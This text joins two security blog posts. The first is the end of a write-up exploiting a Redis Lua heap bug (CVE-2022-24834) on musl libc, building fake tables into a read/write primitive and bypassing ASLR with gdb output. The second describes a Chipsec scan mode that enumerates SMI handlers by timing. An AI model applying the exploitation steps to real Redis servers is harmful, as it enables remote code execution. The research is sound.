     freeable : 1

Group allocation method : another groups slot

Slot status map: UUUUUUUUUUUUUUUU[U]UUUUUUUU (from slot 24 to slot 0)
 (U: Inuse / A: Available / F: Freed)

Result of nontrivial_free() : queue (active[4])

================== SLOT ================== (at 0x7ffff7a5fa30)
      cycling offset : 0x0 (userdata --> 0x7ffff7a5fa30)
        nominal size : 0x48
       reserved size : 0x4
OVERFLOW (user data) : 0
OVERFLOW (next slot) : 0

We can confirm that the stride is 0x50, and the slot size is 0x48.
The Slot status map shows that this group is full, and our
slot is at index 8 (designated by [U] and indexed in
reverse order). Also, the cycling offset is 0, which means
that the userdata associated with the slot actually starts at the
beginning of the slot. As we saw earlier, this will be very useful to
us, as we will rely on predictable relative offsets between slots in the
group.

What we are most interested in is how overwriting the LSB of a slot
at a specific offset in this group will influence what we control during
the type confusion. I’ll use an example to make it clearer. Let’s print
out all the offsets of all the slots in this group:

 0: 0x7ffff7a5f7a0
 1: 0x7ffff7a5f7f0
 2: 0x7ffff7a5f840
 3: 0x7ffff7a5f890
 4: 0x7ffff7a5f8e0
 5: 0x7ffff7a5f930
 6: 0x7ffff7a5f980
 7: 0x7ffff7a5f9d0
 8: 0x7ffff7a5fa20 (B2)
 9: 0x7ffff7a5fa70
10: 0x7ffff7a5fac0 (B)
11: 0x7ffff7a5fb10 (A), (A2)
12: 0x7ffff7a5fb60
13: 0x7ffff7a5fbb0
14: 0x7ffff7a5fc00
15: 0x7ffff7a5fc50
16: 0x7ffff7a5fca0
17: 0x7ffff7a5fcf0
18: 0x7ffff7a5fd40
19: 0x7ffff7a5fd90
20: 0x7ffff7a5fde0
21: 0x7ffff7a5fe30
22: 0x7ffff7a5fe80
23: 0x7ffff7a5fed0
24: 0x7ffff7a5ff20

Before going further, I want to note that other than the
Table being targeted by the overwrite, these stride 0x50
slots can be TString values that we control, so below if I
say target index N, it means the slot at index N is a
Table, but you can assume that slots adjacent (N-1 and N-2)
to it are controlled TString structures.

Let’s start from the lowest LSB in the list and go until the pattern
repeats. We see at 2, the LSB is 0x40, then the pattern repeats at
offset 18. That means we only need to analyze candidate tables between 2
and 17 to cover all cases. We want to see what will happen if we
overwrite any of these entries with 0x22. Where does it fall within an
earlier slot, and how might that influence what we control? Since when
we trigger this confusion, due to the uncontrolled value 0x22, we are
guaranteed to overlap two different 0x50-byte slots, so we may want to
control them both.

A quick refresh in case you’ve forgotten, remember that we are
corrupting the LSB of a TValue in some table’s
Table->array buffer, and that TValue will
point to one of the slots in a group as we are analyzing.

I’ll choose a bad example of a table to target first. Assume we
decide to corrupt the LSB of index 11 (marked with (A)
above), which is at 0x7ffff7a5fb10. If we corrupt its LSB
with 22, we get a confused table at
0x7ffff7a5fb22 so we end starting the confused table inside
of the associated Table. I’ve indicated this above with
(A2) to show they are roughly at the same location. In this
scenario we don’t control the contents of the (A) table at
all, and thus most of (A2) is not controlled. Only the
0x12 bytes of the slot at index 12, which follows the
confused Table will actually be controlled, so probably not
ideal.

Okay, now we should find a better candidate… something that if we
corrupt it, we can jump back some large distance and overlap at least
one TString structure. I’ll be biased and choose the one
that works, but in practice, some trial and error was required. Let’s
target index 10 (marked with (B)), which is at address
0x7ffff7a5fac0. If we corrupt this, we will point to
0x7ffff7a5fa22 (marked with (B2)). Here
(B) will overlaps with both index 8 and the first two bytes
of 9. In this scenario, index 8 could be a TString, which
we control.

Assuming we have a controlled TString, we can check what
our confused Table will look like. First, this is what the
TString looks like (no misaligned access):

(gdb) p/rx *(TString *) 0x7ffff7a5fa20
$7 = {
  tsv = {
    next = 0x7ffff3fa2460,
    tt = 0x4,
    marked = 0x1,
    reserved = 0x0,
    hash = 0xb94dc111,
    len = 0x32
(gdb) x/50b 0x7ffff7a5fa20+0x18
0x7ffff7a5fa38: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x7ffff7a5fa40: 0x00    0x00    0x41    0x41    0x41    0x41    0x41    0x41
0x7ffff7a5fa48: 0x41    0x41    0x30    0x30    0x30    0x30    0x30    0x30
0x7ffff7a5fa50: 0x30    0x31    0x00    0x00    0x00    0x00    0x00    0x00
0x7ffff7a5fa58: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x7ffff7a5fa60: 0x00    0x00    0xff    0xff    0xff    0x7f    0x00    0x00
0x7ffff7a5fa68: 0x00    0x00

We see the TString header values, and then 0x32-bytes of
controlled data. This data I’ve already populated at the right offsets
to demonstrate what values in a confused Table we can
control.

Now let’s look at the confused Table at the misaligned
offset:

(gdb) p/rx *(Table *)  0x7ffff7a5fa22
$5 = {
  next = 0x10400007ffff3fa,
  tt = 0x0,
  marked = 0x0,
  flags = 0x11,
  readonly = 0x32b94d,
  lsizenode = 0x0,
  metatable = 0x0,
  array = 0x4141414141414141,
  node = 0x3130303030303030,
  lastfree = 0x0,
  gclist = 0x0,
  sizearray = 0x7fffffff
}

As would be expected, the uncontrolled parts of TString
are clobbering the fields next through
readonly. But we can easily control the array
and the sizearray fields.

One problem is that the readonly flag is non-zero, which
means even if we get Lua to use this table, we’re not going to be able
to use it for a write primitive. So we will have to work around this
(more on how shortly).

It may also look like we are in trouble because the tt
member is clobbered and no longer is of type LUA_TTABLE.
Fortunately, this isn’t a problem because when accessing numbered index
members inside of a table’s array, Lua will use the type specified by
the TValue pointing at the object to determine its type. It
won’t ever reference the type information inside the object. The type
information inside the object is used specifically by the garbage
collector, which we won’t plan on running. Similarly, the
next pointer is only used by the garbage collector, so it
being invalid is no problem.

We can look at luaH_get() to confirm:

/*
** main search function
*/
const TValue *luaH_get (Table *t, const TValue *key) {
  switch (ttype(key)) {
    case LUA_TNIL: return luaO_nilobject;
    case LUA_TSTRING: return luaH_getstr(t, rawtsvalue(key));
    case LUA_TNUMBER: {
      int k;
      lua_Number n = nvalue(key);
      lua_number2int(k, n);
      if (luai_numeq(cast_num(k), nvalue(key))) /* index is int? */
        return luaH_getnum(t, k);  /* use specialized version */
      /* else go through */
    }
    ...

When looking up a table by index, if the index value is a number, we
encounter the LUA_TNUMBER case. This triggers a call to
luaH_getnum(), which is:

const TValue *luaH_getnum (Table *t, int key) {
  /* (1 <= key    key <= t->sizearray) */
  if (cast(unsigned int, key-1) < cast(unsigned int, t->sizearray))
    return  t->array[key-1];
  else {
    ...

This function will return the TValue from the
Table->array value. The TValue contains its
own tt member, as mentioned earlier. This
TValue may be utilized later by some Lua code to access it
as a Table, which is handled by
luaV_gettable.

void luaV_gettable (lua_State *L, const TValue *t, TValue *key, StkId val) {
  int loop;
  for (loop = 0; loop < MAXTAGLOOP; loop++) {
    const TValue *tm;
    if (ttistable(t)) {  /* `t' is a table? */
      Table *h = hvalue(t);
      const TValue *res = luaH_get(h, key); /* do a primitive get */
      if (!ttisnil(res) ||  /* result is no nil? */
          (tm = fasttm(L, h->metatable, TM_INDEX)) == NULL) { /* or no TM? */
        setobj2s(L, val, res);
        return;
      }
      /* else will try the tag method */
    }
    ...

We can see above that the parameter t of type
TValue is being passed and used as a Table.
The code uses ttistable(t) to ensure that the
TValue indicates that it is a table:

#define ttistable(o) (ttype(o) == LUA_TTABLE)

If it is a table, it calls into the luaH_get() to
reference whatever index is being requested. We know that
luaH_get() itself doesn’t check the
Table->tt value. So we see that if we corrupt a
TValue to point to a confused table, and then access the
associated Table structure to fetch objects, we can do it
without the corrupted Table->tt value ever being
validated, meaning we can use the read-only Table to read
other, possibly more controlled objects.

So, we’ve now got a spoofed read-only table that we can use, which
can be visualized as:

 

Let’s use our read-only Table to try to read a
controlled writable Table object. The first question is,
where do we point our read-only Table->array member? The
leak primitive that Lua gives us only will leak addresses of tables, so
we’re still only limited to values on a similarly fixed-size slot.
However, in this case, we aren’t limited to only overwriting an LSB with
0x22, so what do we do? First, we need to point
Table->array to a fake TValue that itself
points to yet another fake Table object.

Because we are able to control other fields inside our read-only
Table that don’t need to be valid, and because I already
leaked its address, I chose Table->array to be inside
the Table itself. By re-using the
Table->lastfree and Table->gclist
members, we can plant a new TValue of type
LUA_TTABLE, and we can point TValue->value
to some other offset inside the 0x50-stride group. So where should we
point it this time?

Experimentation showed that by pointing to an offset of 0x5 into a
TString, we can create a confused Table where
Table->readonly is NULL, and we are still
able to control the Table->array pointer with controlled
string contents.

What we end up with looks like this:

 

Since this table is writable, we will point its
Table->array to yet another table’s
Table->array address. This final Table
becomes our actual almost-arbitrary read/write (AARW) primitive. Using
insertions onto our writable confused table allows us to control the
address the r/w table will point to. At this point we are finally back
to where the original Ricera Security exploit expects to be.

This ultimately looks like so:

 

This AARW is a bit cumbersome, so the conviso exploit sets up a
TString object on the heap and modifies its length, to
allow for larger swaths of memory to be read in one go.

redis-server/libc
ASLR Bypass and Code Execution

The conviso labs exploit also used a trick originally documented by
saelo
that abuses the fact that a CCoroutine that uses
yield() will end up using setjmp(). This means
while executing Lua code inside the coroutine, it’s possible to use the
AARW primitive to leak the address of the stored setjmp buffer, which
leaks the stack address. From there, it’s possible to leak a GNU libc
address, which is enough to know where to kick off a ROP chain.

I still ran into some more quirks here, like the offset for the musl
libc leak was different. Also, unlike the conviso exploit, we can’t
easily brute force it due to the heap addresses and musl libc addresses
being too similar. This differs from when using brk() in
the original ptmalloc2 example. This led to me having to use a static
offset on the stack to find the musl libc offset.

While poking around with this, I realized there’s maybe another way
to get musl libc addresses, without relying on the
CCoroutine setjmp technique. In Lua, there is a global
table that defines what types of functions are available. This can be
referenced using the symbol _G. By looking inside of
_G, we can see a whole bunch of the function entries, which
point to other CCoroutine structures on the heap. By
leaking the contents of the structure, we can read their function
address. These will all point into redis-server .text
section. We could then parse the redis-server ELF to find a
musl libc GOT entry. Or so I thought… there is another quirk about the
read primitive used, which is that a string object is constructed on the
heap and its length is modified to allow arbitrary (positive) indexing,
which makes it easier to read larger chunks of memory all in one go.
Since the string is on the heap, the leaked redis-server
addresses mentioned above might not be accessible depending on where
they are mapped. For instance, if you are testing with ASLR disabled or
redis-server is not complied PIE, redis-server will almost certainly be
inaccessible. As we saw earlier, the TString data is stored
inline, and not referenced using a pointer, so we can’t just point it
into redis-server.

I chose not to further pursue this and just rely on the static musl
libc offset I found on the stack, as I only needed to target a single
redis version. However, this is possibly an interesting exercise for the
reader.

Conclusion

This is a pretty interesting bug, and hopefully this article serves
to show that revisiting old exploits can be quite fun. Even if a bug is
proven exploitable on one environment, there may still be a lot of work
to be done elsewhere, so don’t necessarily skip over it thinking
everything’s already been explored.

I’d also like to give a big shout out to Ricerca and Conviso for the
impressive and interesting exploits!

Lastly, as I always mention lately, I started using voice coding
around 3-4 years ago for all my research/writing, and so want to thank
the Talon Voice community for building tooling to help people with RSI.
This is your friendly reminder to stand up, stretch, stop hunching, give
your arms a rest, etc. If you want to try voice coding, I suggest
checking out Talon and Cursorless.

Resources

The following is a list of papers mentioned in the article above.

Year Author Title
2017 saelo Pwning
Lua through ‘load’
2019 richfelker Next-gen
malloc for musl libc – Working draft
2021 xf1les musl
libc 堆管理器 mallocng 详解 (Part I)
2021 h_noson DEF
CON CTF Qualifier 2021 Writeup – mooosl
2021 Andrew Haberlandt (ath0) DefCon
2021 moosl Challenge
2021 kylebot [DEFCON
2021 Quals] – mooosl
2023 redis Lua
cjson and cmsgpack integer overflow issues (CVE-2022-24834)
2023 Dronex, ptr-yudai Fuzzing
Farm #4: Hunting and Exploiting 0-day [CVE-2022-24834]
2023 Conviso Research Team Improvement
of CVE-2022-24834 public exploit

Tools

  • muslheap: A gdb
    plugin designed for analyzing the mallocng heap structures.

Enumerating System Management Interrupts

System Management Interrupts (SMI) provide a mechanism for entering System Management Mode (SMM) which primarily implements platform-specific functions related to power management. SMM is a privileged execution mode with access to the complete physical memory of the system, and to which the operating system has no visibility. This makes the code running in SMM an ideal target for malware insertion and potential supply chain attacks. Accordingly, it would be interesting to develop a mechanism to audit the SMIs present on a running system with the objective of cross-referencing this information with data provided by the BIOS supplier. This could help ensure that no new firmware entry-points have been added in the system, particularly in situations where there is either no signature verification for the BIOS, or where such verification can be bypassed by the attacker.

The section 32.2, “System Management Interrupt (SMI)” of Intel’s System Programming Guide [1], states the following regarding the mechanisms to enter SMM and its assigned system priority:

“The only way to enter SMM is by signaling an SMI through the SMI# pin on the processor or through an SMI message received through the APIC bus. The SMI is a nonmaskable external interrupt that operates independently from the processor’s interrupt- and exception-handling mechanism and the local APIC. The SMI takes precedence over an NMI and a maskable interrupt. SMM is non-reentrant; that is, the SMI is disabled while the processor is in SMM.”

Many mainboard Chipsets (PCH), such as the Intel 500 series chipset family [2], expose the I/O addresses B2h and B3h, enabling the signaling of the SMI# pin on the processor. Writting a byte-value to the address B2h signals the SMI code that corresponds to the written value. The address B3h is used for passing information between the processor and the SMM and needs to be written before the SMI is signaled.

Chipsec [3] is the industry standard tool for auditing the security of x86 platform firmware. It is open source and maintained by Intel. Chipsec includes a module called smm_ptr, which searches for SMI handlers that result in the modification of an allocated memory buffer. It operates by filling the allocated memory with an initial value that is checked after every SMI call. It then iterates through all specified SMI codes, looking for changes in the buffer, the address of which is passed to the SMI via the processor’s general-purpose registers (GPRS).

Although highly useful as a reference approach to trigger SMIs by software, Chipsec’s smm_ptr module does not fulfill the objective of enumerating them. Only when the SMI has an observable change in the passed memory buffer does the module consider it vulnerable and flags its existance.

Since our goal is to enumerate SMIs, I considered measuring the time it takes for the SMI to execute as a simple measure of the complexity of its handler. The hypothesis is that an SMI code ignored by the BIOS would result in a shorter execution time compared to when the SMI is properly attended. With this objective in mind, I added the ‘scan’ mode to the smm_ptr module [4].

The scan mode introduces a new ioctl command to the Chipsec’s kernel module that triggers the SMI and returns the elapsed time to the caller. This mode maintains an average of the time it takes for an SMI to execute and flags whenever one exceeds a defined margin.

In the initial tests performed, an unexpected behaviour was observed in which, with a periodicity of one second, a ten times larger runtime appeared for the same SMI code. To confirm these outliers were only present when the SMI was signaled, I implemented an equivalent test measuring the time spent by an equivalently long time-consuming loop replacing the SMI call. The results of both tests are presented below.

CPU counts per SMI call
CPU counts per test loop execution

The details of each long-running SMI are detailed next, where ‘max’ and ‘min’ values are the maximum and minimum measured elapsed time in CPU counts, ‘total’ is the number of SMIs signaled, ‘address’ shows the register used for passing the address of the allocated buffer, and ‘data’ is the value written to the I/O address B3h.

SMI: 0, max: 5023124, min: 680534, count: 7, total: 12288,
  long-running SMIs: [
  {'time offset': 278.017 ms, 'counts': 3559564, 'rcx': 11, 'address': rbx, 'data': 0x09},
  {'time offset': 1278.003 ms, 'counts': 3664844, 'rcx': 14, 'address': rbx, 'data': 0x2C},
  {'time offset': 2277.865 ms, 'counts': 4244506, 'rcx': 1, 'address': rbx, 'data': 0x50},
  {'time offset': 3277.685 ms, 'counts': 4950032, 'rcx': 4, 'address': rsi, 'data': 0x73},
  {'time offset': 4277.681 ms, 'counts': 5023124, 'rcx': 8, 'address': rbx, 'data': 0x96},
  {'time offset': 5277.898 ms, 'counts': 4347570, 'rcx': 11, 'address': rbx, 'data': 0xB9},
  {'time offset': 6277.909 ms, 'counts': 4374736, 'rcx': 14, 'address': rsi, 'data': 0xDC}]

I don’t know the reason for these periodic lengthy SMIs. I can only speculate these might be NMI interrupts being blocked by SMM and serviced with priority right after exiting SMM and before the time is measured. In any case, I opted for performing a confirmation read once a long-running SMI is found, which effectively filters out these long measurements, resulting in the output shown below. It has an average elapsed time of 770239.23 counts and standard deviation of 7377.06 counts (0.219749 ms and 2.104e-06 seconds respectively on a 3.5 GHz CPU).

CPU counts per SMI filtered out the outliers

To discard any effects of the values passed to the SMI, I ran the test by repeatedly signaling the same SMI code and parameters. Below is the result using the confirmation read strategy, showing an average value of 769718.88 counts (0.219600 ms) and standard deviation of 6524.88 counts (1.861e-06 seconds).

CPU counts per SMI filtered out the outliers and using the same SMI parameters

The proposed scan mode is effective in identifying long-running SMIs present in the system. However, it is unable to find others that fall within the bounds of the defined threshold. For example, using an arbitrary threshold of 1/3 times larger than the average, the implementation was not successful noticing some of the SMIs flagged by the smm_ptr’s fuzz and fuzzmore modes. The main reasons are the large deviation observed and the challenge of dealing with a system for which no confirmed SMI codes are provided, making it difficult to calibrate the algorithm and establish a suitable threshold value.

The implementation has been merged into the upstream version of Chipsec and will be included in the next release [5].

[1] Intel® 64 and IA-32 Architectures Software Developer’s Manual Volume 3 (3A, 3B, 3C, 3D): System Programming Guide
[2] Intel® 500 Series Chipset Family On- Package Platform Controller Hub Datasheet, Volume 1 of 2. Rev. 007, September 2021.
[3] https://chipsec.github.io/
[4] https://github.com/nccgroup/chipsec/commit/eaad11ad587d951d3720c43cbce6d068731b7cdb
[5] https://github.com/chipsec/chipsec/pull/2141

❌